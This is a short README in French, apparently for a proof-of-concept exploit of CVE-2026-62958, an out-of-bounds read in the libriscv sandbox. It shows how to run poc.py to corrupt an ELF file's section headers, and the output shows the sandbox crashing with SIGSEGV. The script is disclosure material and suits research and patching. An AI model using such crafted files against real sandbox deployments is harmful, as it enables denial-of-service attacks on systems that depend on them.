
Exploit de preuve de concept pour CVE-2026-62958 démontrant une vulnérabilité de lecture hors limites dans le sandbox Libriscv, permettant le crash du sandbox via un binaire ELF spécialement conçu.
Une vulnérabilité dans Libriscv permet à l'attaquant de faire planter le bac à sable en utilisant une lecture hors limites.
Pour créer un mauvais elf :
python3 poc.py samplefile poisoned_file
Résultats :
❯ python3 poc.py fib poisoned_file
Manipulating .text section header at offset 0x250
Manipulating .symtab section header at offset 0x710
❯ ./rvlinux poisoned_file
fish: Job 1, './rvlinux poisoned_file' terminated by signal SIGSEGV (Address boundary error)